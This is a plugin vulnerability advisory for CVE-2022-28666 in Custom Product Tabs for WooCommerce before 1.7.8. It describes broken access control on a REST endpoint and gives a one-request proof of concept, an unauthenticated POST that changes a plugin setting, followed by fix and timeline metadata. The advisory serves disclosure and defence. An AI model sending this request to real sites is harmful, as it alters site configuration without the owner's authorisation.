Custom Product Tabs for WooCommerce < 1.7.8 – Unauthenticated Toggle Content Setting Update | CVE 2022-28666 | Plugin Vulnerabilities

Description

The plugin does not have proper authorisation in one of its REST endpoint, allowing unauthenticated users to update the "Toggle the_content filter" setting

Proof of Concept

POST /wp-json/yikes/cpt/v1/settings HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 24
Connection: close

toggle_the_content=false

Affects Plugins

yikes-inc-easy-custom-woocommerce-product-tabs

Fixed in 1.7.8

References

CVE

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Tien Nguyen Anh

Verified

Yes

WPVDB ID

2f20e14b-3a97-41c5-a3ce-054ed2450aa3

Timeline

Publicly Published

2022-06-28 (about 3 years ago)

Added

2022-06-28 (about 3 years ago)

Last Updated

2023-04-04 (about 2 years ago)

Other

Published

Title

Published

2021-07-05

Title

Filter Gallery < 0.0.7 - Unauthorised AJAX Calls

Published

2021-10-05

Title

Batch Cat <= 0.3 - Subscriber+ Arbitrary Categories Add/Set/Delete to Posts

Published

2020-08-21

Title

Contact Form - Form builder by Kali Forms < 2.1.2 - Authenticated Plugin's Settings Change

Published

2021-08-31

Title

WooCommerce Dynamic Pricing & Discounts < 2.4.2 - Unauthenticated Settings Export

Published

2024-04-26

Title

Analytify < 5.2.4 - Missing Authorization to Unauthenticated Google Analytics Tracking ID Modification